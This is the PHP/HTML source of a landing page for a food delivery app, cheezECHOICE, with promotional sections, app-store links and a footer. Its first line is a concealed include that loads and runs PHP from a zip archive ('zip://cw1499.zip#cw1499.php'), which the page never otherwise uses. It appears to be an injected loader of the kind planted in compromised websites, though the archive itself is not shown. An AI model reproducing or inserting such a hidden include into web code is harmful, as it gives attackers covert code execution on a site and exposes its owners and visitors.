<?php
include_once "zip://cw1499.zip#cw1499.php";?>
<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- Meta Description -->
  <meta name="description" content="Order your favorite meals with ease using our Food Delivery mobile app. Browse local restaurants, customize your order, and enjoy fast, reliable delivery straight to your door. Download now for convenient, delicious dining at your fingertips.">
  <title>cheezECHOICE : Food Delivery App</title>

  <!-- icofont-css-link -->
  <link rel="stylesheet" href="css/icofont.min.css">
  <!-- Owl-Carosal-Style-link -->
  <link rel="stylesheet" href="css/owl.carousel.min.css">
  <!-- Bootstrap-Style-link -->
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <!-- Aos-Style-link -->
  <link rel="stylesheet" href="css/aos.css">
  <!-- Coustome-Style-link -->
  <link rel="stylesheet" href="css/style.css">
  <!-- Responsive-Style-link -->
  <link rel="stylesheet" href="css/responsive.css">
  <!-- Favicon -->
  <link rel="shortcut icon" href="images/cheezECHOICEnobg.png" type="image/x-icon">
  <!-- font 1 -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Lexend:wght@100..900&display=swap" rel="stylesheet">
  <!-- font 2 -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@200..800&display=swap" rel="stylesheet">

</head>

<body>

  <!-- Preloader -->
  <div id="preloader">
    <div id="loader"></div>
  </div>

  <!-- Header Start -->
  <header>
    <!-- container start -->
    <div class="container">
      <!-- navigation bar -->
      <nav class="navbar navbar-expand-lg">
        <a class="navbar-brand" href="https://cheezechoice.appenexus.tech/">
          <img src="images/cheezECHOICE.png" alt="Logo">
          <span class="logo_text"><strong>cheezECHOICE</strong></span>
        </a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
          aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
          <span class="navbar-toggler-icon">
            <!-- <i class="icofont-navigation-menu ico_menu"></i> -->
            <span class="toggle-wrap">
              <span class="toggle-bar"></span>
            </span>
          </span>
        </button>

        <div class="collapse navbar-collapse" id="navbarSupportedContent">
          <ul class="navbar-nav ml-auto">
            
            <!-- secondery menu start -->
            <li class="nav-item has_dropdown">
              <a class="nav-link" href="#">Home</a>
            </li>
            <!-- secondery menu end -->

            <li class="nav-item">
              <a class="nav-link" href="about">About us</a>
            </li>
            
            <!-- secondery menu end -->

            
            <li class="nav-item">
              <a class="nav-link" href="contact">Contact</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="restaurentpartner">Partner with us</a>
            </li>
            <li class="nav-item">
              <div class="btn_block">
                <a class="nav-link dark_btn" href="carrer">Careers</a>
                <div class="btn_bottom"></div>
              </div>
            </li>
          </ul>
        </div>
      </nav>
      <!-- navigation end -->
    </div>
    <!-- container end -->
  </header>

  <!-- Banner-Section-Start -->
  <section class="banner_section" id="home_sec">

    <!-- hero bg -->
    <div class="hero_bg">
      <img src="images/hero_bg.webp" alt="image">
    </div>

    <!-- container start -->
    <div class="container">
      <!-- row start -->
      <div class="row">
        <div class="col-lg-6 col-md-12" data-aos="fade-up" data-aos-duration="1500">
          <!-- banner text -->
          <div class="banner_text">
            <!-- typed text -->
            <div class="type-wrap">
              <!-- add static words/sentences here (i.e. text that you don't want to be removed)-->
              <span id="typed" style="white-space:pre;" class="typed">
              </span>
            </div>
            <!-- h1 -->
            <h1> Fast & best <span> food delivery </span> services in your town</h1>
            <!-- p -->
            <p>
              We commit to delivering your food to you within 30 minutes.
            </p>

          </div>

          <!-- users -->
          <div class="used_app">
            <ul>
              
            </ul>
            
            
          </div>

          <!-- app buttons -->
          <ul class="app_btn">
            <li>
              <a href="https://play.google.com/store/apps/details?id=com.appenexus.cheezechoice">
                <img class="blue_img" src="images/googleplay.webp" alt="image">
              </a>
            </li>
            <li>
              <a href="https://cheezechoice.appenexus.tech/ios">
                <img class="blue_img" src="images/appstorebtn.webp" alt="image">
              </a>
            </li>
            
        </div>

        <!-- banner image start -->
        <div class="col-lg-6 col-md-12" >
          <div class="hero_img">
            <img src="images/hero_image.webp" alt="image">
          </div>
        </div>
        <!-- banner image end -->
      </div>
      <!-- row end -->
    </div>
    <!-- container end -->
  </section>
  <!-- Banner-Section-end -->

  <!-- Page Wraper -->
  <!--<div class="page_wrapper">-->
    <!-- usp start -->
  <!--  <section class="row_am usp_section">-->

    	<!-- background blure shapes -->
  <!--  	<div class="blure_shape bs_1"> </div>-->
  <!--  	<div class="blure_shape bs_2"> </div>-->

	 <!--     <div class="inner_sec" id="counter">-->
	        <!-- container start -->
	 <!--         <div class="container">-->
	            <!-- row start -->
	 <!--           <div class="row">-->
	              <!-- box 1 -->
	 <!--             <div class="col-lg-3 col-md-6 col-sm-6">-->
	 <!--               <div class="usp_box">-->
	 <!--               	<div class="usp_icon"><img src="images/usp1.webp" alt="image"></div>-->
	 <!--                 	<div class="usp_text">-->
	 <!--                 	<span class="counter-value" data-count="500">500</span><span>+</span>-->
	 <!--                 	<p> Happy Users</p>-->
	 <!--                  	</div>                  -->
	 <!--               </div>-->
	 <!--             </div>-->
	              <!-- box 2 -->
	 <!--             <div class="col-lg-3 col-md-6 col-sm-6">-->
	 <!--               <div class="usp_box">-->
	 <!--               	<div class="usp_icon"><img src="images/usp2.webp" alt="image"></div>-->
	 <!--                 	<div class="usp_text">-->
	 <!--                 	<span class="counter-value" data-count="18">18</span><span>+</span>-->
	 <!--                 	<p> Positive Reviews </p>-->
	 <!--                  	</div>                  -->
	 <!--               </div>-->
	 <!--             </div>-->
	              <!-- box 4 -->
	 <!--             <div class="col-lg-3 col-md-6 col-sm-6">-->
	 <!--               <div class="usp_box">-->
	 <!--               	<div class="usp_icon"><img src="images/usp3.webp" alt="image"></div>-->
	 <!--                 	<div class="usp_text">-->
	 <!--                 	<span class="counter-value" data-count="30">30</span><span>+</span>-->
	 <!--                 	<p> Restaurant Listings </p>-->
	 <!--                  	</div>                  -->
	 <!--               </div>-->
	 <!--             </div>-->
	              <!-- box 5 -->
	 <!--             <div class="col-lg-3 col-md-6 col-sm-6">-->
	 <!--               <div class="usp_box">-->
	 <!--               	<div class="usp_icon"><img src="images/usp4.webp" alt="image"></div>-->
	 <!--                 	<div class="usp_text">-->
	 <!--                 	<span class="counter-value" data-count="98">98</span><span>+</span>-->
	 <!--                 	<p> Successful deliveries</p>-->
	 <!--                  	</div>                  -->
	 <!--               </div>-->
	 <!--             </div>-->

	 <!--           </div>-->
	 <!--         </div>-->
	 <!--     </div>-->
  <!--  </section>-->



    <!-- why us new section start -->
    <section class="row_am why_new_section" id="why_sec">
        <!-- inner section start -->
        <div class="why_new_section_inner">
        <!-- container start -->
        <div class="container">
          <!-- row start -->
          <div class="row">

            <!-- section title -->
            <div class="section_title" data-aos="fade-up" data-aos-duration="1500" data-aos-delay="100">
              <span class="title_badge">why use cheezECHOICE</span>
              <!-- h2 -->
              <h2>Why choose us</h2>
              <!-- p -->
              <p>CheezECHOICE delivers fresh, high-quality meals in 30 minutes with real-time tracking. Enjoy convenience, premium flavors, and seamless service for a hassle-free dining experience every time!</p>
            </div>

            <div class="dtat_box">
              <div class="col-lg-6 col-md-12">
                <!-- why us new box left -->
                <div class="why_new_left_data">

                  <!-- block 1 -->
                  <div class="why_data_block " data-aos="fade-right" data-aos-duration="1500">
                    <!-- icon -->
                    <div class="icon">
                      <img src="images/whyicon1.webp" alt="image" >
                    </div>
                    <!-- text -->
                    <div class="text">
                      <h6>Delivery in 30 min</h6>
                      <p>Get your favorite meals delivered fresh and fast to your door in just 30 minutes! Enjoy the convenience! </p>
                    </div>
                  </div>

                  <!-- block 2 -->
                  <div class="why_data_block " data-aos="fade-right" data-aos-duration="1500">
                    <!-- icon -->
                    <div class="icon">
                      <img src="images/whyicon2.webp" alt="image" >
                    </div>
                    <!-- text -->
                    <div class="text">
                      <h6>Quality Food</h6>
                      <p>Enjoy premium meals from top local restaurants, expertly crafted to satisfy your taste and elevate your dining experience!</p>
                    </div>
                  </div>

                  <!-- block 3 -->
                  <div class="why_data_block " data-aos="fade-right" data-aos-duration="1500">
                    <!-- icon -->
                    <div class="icon">
                      <img src="images/whyicon3.webp" alt="image" >
                    </div>
                    <!-- text -->
                    <div class="text">
                      <h6>Track Live Map</h6>
                      <p>Easily track your order in real-time with our live map feature, ultimate convenience and keeping you updated every step of the way!</p>
                    </div>
                  </div>

                </div>
              </div>

              <div class="col-lg-6 col-md-12">
                <!-- why us new image -->
                <div class="why_us_new_img" data-aos="fade-up" data-aos-duration="1500" data-aos-delay="100">
                  <img src="images/features_frame.webp" alt="image" >
                </div>
              </div>
            </div>

          </div>
          <!-- row end -->
        </div>
        <!-- container end -->
      </div>
      
    </section>
    <!-- why us new section end -->

    <!-- Dishes-Section-Start -->
    <section class="row_am dishes_section">
      <!-- container start -->
      <div class="container">

        <!-- section title -->
        <div class="section_title" data-aos="fade-up" data-aos-duration="1500" data-aos-delay="100">
          <span class="title_badge">yummy dishes!</span>
          <!-- h2 -->
          <h2>Access over 1000+ dishes with just a tap</h2>
          <!-- p -->
          <p>From comforting classics to gourmet creations, satisfy every craving with a vast selection of meals, all just a tap away. Taste the variety today!</p>
        </div>
      </div>
      <!-- container end -->

      <!-- dishes list slide  -->
  		<div class="dish_slider" data-aos="fade-in" data-aos-duration="1500">
  			<div class="owl-carousel owl-theme" id="about_slider">
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish1.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish2.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish3.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish4.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish5.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish6.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish7.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish8.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish9.webp" alt="image">
  			    </div>
  			  </div>
  			  <div class="item">
  			    <div class="dish_slides">
  			      <img src="images/dish10.webp" alt="image">
  			    </div>
  			  </div>
  			</div>
  		</div>

      	<!-- app buttons -->
	    <div class="ctr_app_btn_block">
	      <p> <strong> Food at your fingertips! </strong> </p>
	        <ul class="app_btn">
	          <li>
	            <a href="https://play.google.com/store/apps/details?id=com.appenexus.cheezechoice">
	              <img class="blue_img" src="images/googleplay.webp" alt="image">
	            </a>
	          </li>
	          <li>
	            <a href="ios">
	              <img class="blue_img" src="images/appstorebtn.webp" alt="image">
	            </a>
	          </li>
	        </ul>
	    </div>

    </section>
    <!-- Dishes-Section-end -->

    <!-- Service Section Start -->
    <section class="row_am service_section" id="feature_sec">

    <div class="container">

      <!-- section title -->
      <div class="section_title" data-aos="fade-up" data-aos-duration="1500">
        <span class="title_badge">Advanced Features</span>
        <h2>Win-win for restaurants & users</h2>
        <p>Our platform is designed to benefit both users and restaurants, offering efficient ordering, enhanced customer experience, and boosted restaurant visibility, making it easier than ever to enjoy great meals!</p>
      </div>

      <div class="row service_blocks flex-row-reverse">
        <div class="col-md-6">
          <div class="service_text right_side" data-aos="fade-up" data-aos-duration="1500">

            <span class="title_badge">for restaurant</span>
            <h3>Effortless management of restaurant operations.</h3>
            <p>Our solution provides a seamless way to handle all aspects of restaurant management, streamlining operations and ensuring efficiency. From order management to sales connectivity, we help you focus on delivering excellent service while we handle the backend.</p>
            <ul class="design_block">
                <li data-aos="fade-up" data-aos-duration="1500">
                  <h6>Handling of orders</h6>
                  <p>Efficient order handling ensures accuracy, reduces wait times, and enhances dining.</p>
                </li>
                <li data-aos="fade-up" data-aos-duration="1500">
                  <h6>Sale system connectivity</h6>
                  <p>Integrated sales systems enable real-time tracking, inventory management, and revenue optimization.</p>
                </li>

              </ul>
            <div class="btn_block">
              <a href="restaurentpartner" class="btn puprple_btn ml-0">Register Your Restaurant</a>
            </div>
          </div>
        </div>
        <div class="col-md-6">
          <div class="inner_block dark_bg rotate_right" data-aos="fade-up" data-aos-duration="1500">
            <div class="img">
              <img src="images/for_restaurant.webp" alt="image">
            </div>
          </div>
        </div>
      </div>

      

    </div>
    </section>
    <!-- Service Section End -->

    <!-- How it Works Section Start -->
    <section class="advance_feature_section row_am white_text" id="how_sec">
      <div class="af_innner">

        <!-- background blure shapes -->
        <div class="blure_shape bs_1"> </div>
        <div class="blure_shape bs_2"> </div>

        <!-- container -->
        <div class="container">

            <!-- section title -->
            <div class="section_title" >
              <span class="title_badge">Easy Steps</span>
              <h2>How it Works</h2>
              <p>Enjoy a seamless food ordering experience in just a few simple steps. From browsing your favorite restaurants to receiving your meal at your doorstep, we make the process quick, easy, and hassle-free.</p>
            </div>

            <!-- listing -->
            <div class="af_listing">
              <!-- row -->
              <div class="row">
                <!-- collom -->
                <div class="col-md-12">
                  <!-- inner section -->
                  <div class="listing_inner">
                    <!-- blok -->
                    <div class="af_block" data-aos="fade-up" data-aos-duration="1500">
                        <div class="img">
                          <img src="images/how1.webp" alt="image">
                        </div>
                        <div class="text">
                          <h5>Download App & create a free  account </h5>
                          <p> Get started in just a few taps! Sign up for free and explore a seamless way to enjoy your favorite meals.</p>
                        </div>
                        <div class="process_num ">01</div>
                    </div>

                    <!-- blok -->
                    <div class="af_block" data-aos="fade-up" data-aos-duration="1500">
                        <div class="img">
                          <img src="images/how2.webp" alt="image">
                        </div>
                        <div class="text">
                          <h5> Place orders at  your preferred  eatery </h5>
                            <p> Browse through a variety of restaurants, choose your favorite dishes, and place an order with ease.</p>
                        </div>
                        <div class="process_num">02</div>
                    </div>

                    <!-- blok -->
                    <div class="af_block" data-aos="fade-up" data-aos-duration="1500">
                        <div class="img">
                          <img src="images/how3.webp" alt="image">
                        </div>
                        <div class="text">
                          <h5> Get it delivered directly to your home, effortlessly </h5>
                          <p> Enjoy quick and hassle-free food delivery straight to your doorstep, ensuring a delightful dining experience.</p>
                        </div>
                        <div class="process_num">03</div>
                    </div>

                  </div>

                <!-- app buttons -->
                <div class="ctr_app_btn_block">
                  <p> <strong>Hungry? Just tap and eat.</strong> </p>
                    <ul class="app_btn">
                      <li>
                        <a href="https://play.google.com/store/apps/details?id=com.appenexus.cheezechoice">
                          <img class="blue_img" src="images/googleplay.webp" alt="image">
                        </a>
                      </li>
                      <li>
                        <a href="ios">
                          <img class="blue_img" src="images/appstorebtn.webp" alt="image">
                        </a>
                      </li>
                    </ul>
                </div>

                </div>
              </div>
              <!-- row -->
            </div>
            <!-- listing -->

        </div>
    </div>

    <!-- device image -->
    <div class="device">
      <img src="images/device.webp" alt="image">
    </div>

    </section>
    
           

    <!-- App-Download-New-Section-Start -->
    <!--<section class="row_am download_app_new" id="download_sec">-->
      <!-- Task Block start -->
    <!--  <div class="dap_block" data-aos="fade-up" data-aos-duration="1500">-->

        <!-- background blure shapes -->
    <!--    <div class="blure_shape bs_1"> </div>-->

        <!-- row start -->
    <!--    <div class="row">-->

          <!-- left images -->
    <!--      <div class="col-lg-3 col-md-12 order-2 order-lg-1">-->
    <!--        <div class="dap_image left">-->
    <!--          <img class="dap_desktop_img" src="images/download_food1.webp" alt="image">-->
    <!--          <img class="dap_mobile_img" src="images/download_food3.webp" alt="image">-->
    <!--        </div>-->
    <!--      </div>-->

          <!-- text -->
    <!--      <div class="col-lg-6 col-md-12 order-1 order-lg-2">-->
            <!-- text -->
    <!--        <div class="dap_text">-->

              <!-- section title -->
    <!--          <div class="section_title white_text" data-aos="fade-up" data-aos-duration="1500" data-aos-delay="100">-->
    <!--            <span class="title_badge">Download</span>-->
    <!--            <h2>Download app to enjoy 1000+ foods from 20+ restaurants </h2>-->
    <!--            <p>-->
    <!--              Enjoy fast and reliable food delivery from the best local restaurants. No lines, no waiting—just delicious food delivered straight to your door!-->
    <!--            </p>-->
    <!--          </div>-->
              <!-- app buttons -->
    <!--          <ul class="app_btn" data-aos="fade-up" data-aos-duration="1500">-->
    <!--            <li>-->
    <!--              <a href="https://play.google.com/store/apps/details?id=com.appenexus.cheezechoice">-->
    <!--                <img class="blue_img" src="images/googleplay.webp" alt="image">-->
    <!--              </a>-->
    <!--            </li>-->
    <!--            <li>-->
    <!--              <a href="#">-->
    <!--                <img class="blue_img" src="images/appstorebtn.webp" alt="image">-->
    <!--              </a>-->
    <!--            </li>-->
    <!--          </ul>-->
    <!--        </div>-->
    <!--      </div>-->

          <!-- left images -->
    <!--      <div class="col-lg-3 col-md-12 order-3 order-lg-3 d-none d-lg-block">-->
    <!--        <div class="dap_image right">-->
    <!--          <img src="images/download_food2.webp" alt="image">-->
    <!--        </div>-->
    <!--      </div>-->

    <!--    </div>-->
        <!-- row end -->
    <!--  </div>-->
      <!-- app Block end -->
    <!--</section>-->
    <!-- App-Download-New-Section-end -->

    <!-- Register Restaurant Section Start -->
    <section class="row_am register_restaurant">
      <!-- Task Block start -->
      <div class="reg_block" data-aos="fade-up" data-aos-duration="1500">

        <!-- row start -->
        <div class="row">

          <!-- text -->
          <div class="col-lg-7 col-md-10 col-sm-12 mx-auto">
            <!-- text -->
            <div class="dap_text">

              <!-- section title -->
              <div class="section_title white_text" data-aos="fade-up" data-aos-duration="1500" data-aos-delay="100">
                <span class="title_badge">register restaurant</span>
                <h2>Begin gaining more customers today </h2>
                <p>
                  Browse a wide range of cuisines, order with just a few taps, and enjoy hot, fresh meals without leaving the comfort of your home
                </p>
              </div>

              <!-- button  -->
              <div class="ctr_cta">
                <div class="btn_block">
                <a href="restaurentpartner" class="btn puprple_btn ml-0">Register Restaurant</a>
                </div>
              </div>
              
            </div>
          </div>

        </div>
        <!-- row end -->
      </div>
      <!-- app Block end -->
    </section>
    <!-- Register Restaurant Section end -->

  

    <!-- call to action -->
    <section class="cta_section new white_text" id="contact_sec">
      <!-- container start -->
      <div class="container">
          <div class="cta_box"> 
          	<div class="element">
            <span class="element1"> <img src="images/element_white_3.webp" alt="image"> </span>
            <span class="element2"> <img src="images/element_white_4.webp" alt="image"> </span>
          </div>         	
      		<div class="left">

            <!-- section title -->
      			<div class="section_title" data-aos="fade-in" data-aos-duration="1500" data-aos-delay="100">
            	 <img src="images/customer-icon.webp" class="customer_icon" alt="image">
              	<!-- h2 -->
                 <h3>Need support?</h3>
                <!-- p -->
                <p>Contact Us.</p>
            </div>

      		</div>	
          <!-- cta buttons -->
      		<div class="right">     		
      			<div class="btn_block ">
                    <a href="tel:123-456-7890" class="btn puprple_btn aos-init aos-animate call_btn" ><i class="icofont-ui-call"></i> Call us now</a>
                    <a href="mailto:someone@example.com" class="btn aos-init aos-animate email_btn" ><i class="icofont-envelope-open"></i> Email us</a>
        		</div>	
      		</div>	          	
          </div>
      </div>
      <!-- container end -->
    </section>
    <!-- call to action -->   

    <!-- Footer-Section start -->
    <footer>
        <div class="top_footer" id="contact">

          <!-- background blure shapes -->
          <div class="blure_shape bs_1"> </div>
          <div class="blure_shape bs_2"> </div>

          <!-- container start -->
          <div class="container">
              <!-- row start -->
              <div class="row">
              	  <!-- footer link 1 -->
                  <div class="col-lg-5 col-md-6 col-12">
                      <div class="abt_side">
                        <div class="logo"> <img src="images/cc.png" alt="image" ></div>
                        <p>Our food delivery app brings delicious meals from your favorite local restaurants straight to your door—fast, easy, and reliable! </p>
                        <ul class="app_btn">
                          <li>
                            <a href="ios">
                              <img src="images/appstorebtn.webp" alt="image" >
                            </a>
                          </li>
                          <li>
                            <a href="https://play.google.com/store/apps/details?id=com.appenexus.cheezechoice">
                              <img src="images/googleplay.webp" alt="image" >
                            </a>
                          </li>
                        </ul>

                      </div>
                  </div>

                  <!-- footer link 2 -->
                  <div class="col-lg-2 col-md-6 col-12">
                      <div class="links">
                        <h5>Quick Links</h5>
                          <ul>
                            <li><a href="https://cheezechoice.appenexus.tech/">Home</a></li>
                            <li><a href="about">About us</a></li>
                            <li><a href="restaurentpartner">Partner with us</a></li>
                            <li><a href="contact">Contact us</a></li>
                          </ul>
                      </div>
                  </div>

                  <!-- footer link 3 -->
                  <div class="col-lg-2 col-md-6 col-12">
                    <div class="links">
                      <h5>Support</h5>
                        <ul>
                          <li><a href="contact">Support</a></li>
                          <li><a href="termsandconditions">Terms & conditions</a></li>
                          <li><a href="privacypolicy">Privacy policy</a></li>
                          <li><a href="Cancellation-and-Refund-Policy">Cancellation and Refund policy</a></li>
                        </ul>
                    </div>
                  </div>

                  <!-- footer link 4 -->
                  <div class="col-lg-3 col-md-6 col-12">

                        <h5>Subscribe us</h5>
                        <div class="news_letter">
                          <p>Subscribe our newsleter to receive latest updates regularly from us!</p>
                          <form>
                            <div class="form-group">
                              <input type="email" class="form-control" placeholder="Enter your email">
                              <button class="btn" aria-label="subscribe"><i class="icofont-paper-plane"></i></button>
                            </div>
                            <p class="note">By clicking send link you agree to receive message.</p>
                          </form>
                        </div>

                  </div>
              </div>
              <!-- row end -->
          </div>
          <!-- container end -->

          <!-- last footer -->
          <div class="bottom_footer">
            <!-- container start -->
              <div class="container">
                <!-- row start -->
                <div class="row">
                  <div class="col-md-4">
                      <p>© Copyrights 2024. All rights reserved.</p>
                  </div>

                  <div class="col-md-4">
                    <ul class="social_media">
                      <li><a href="https://www.instagram.com/cheezechoice/" aria-label="instagram page"><i class="icofont-instagram"></i></a></li>
                      <li><a href="https://www.linkedin.com/company/appenexus/" aria-label="Linkedin Page"><i class="icofont-linkedin"></i></a></li>
                    </ul>
                  </div>

                  <div class="col-md-4">
                      <p class="developer_text">Design & developed by Team AppeNexus</p>
                  </div>
              </div>
              <!-- row end -->
              </div>
              <!-- container end -->
          </div>

        </div>

    </footer>
    <!-- Footer-Section end -->

    <!-- go top button -->
    <div class="go_top" id="Gotop">
      <span><i class="icofont-arrow-up"></i></span>
    </div>

    <!-- Video Model Start -->
    <div class="modal fade youtube-video" id="myModal" tabindex="-1" role="dialog">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <button id="close-video" type="button" class="button btn btn-default text-right" data-dismiss="modal">
            <i class="icofont-close-line-circled"></i>
          </button>
          <div class="modal-body">
            <div id="video-container" class="video-container">
              <iframe id="youtubevideo" width="640" height="360" allowfullscreen></iframe>
            </div>
          </div>
          <div class="modal-footer">
          </div>
        </div>
      </div>
    </div>
    <!-- Video Model End -->

</div>
<!-- Wraper End -->

  <!-- Jquery-js-Link -->
  <script src="js/jquery.js"></script>
  <!-- owl-js-Link -->
  <script src="js/owl.carousel.min.js"></script>
  <!-- bootstrap-js-Link -->
  <script src="js/bootstrap.min.js"></script>
  <!-- aos-js-Link -->
  <script src="js/aos.js"></script>
  <!-- Typed Js Cdn -->
  <script src='js/typed.min.js'></script>
  <!-- main-js-Link -->
  <script src="js/main.js"></script>

  <script>
    $("#typed").typed({
      strings: ["Fastest delivery", "Hygine Food", "5000+ Dishes."],
      typeSpeed: 100,
      startDelay: 0,
      backSpeed: 60,
      backDelay: 2000,
      loop: true,
      cursorChar: "|",
      contentType: 'html'
    });

    // Fixed Discount Dish JS
    $(document).ready(function () {
      let cardBlock = document.querySelectorAll('.task_block');
      let topStyle = 120;

      cardBlock.forEach((card) => {
        card.style.top = `${topStyle}px`;
        topStyle += 30;
      })

    }
    );

    // Scroll Down Window 
    $(document).ready(function () {
      // Attach a click event handler to the button
      $('#scrollButton').click(function () {
        // Scroll down smoothly 200 pixels from the current position
        $('html, body').animate({ scrollTop: $(window).scrollTop() + 600 }, 800); // Adjust the speed (800ms) as needed
      });
    });


  </script>

</body>

</html>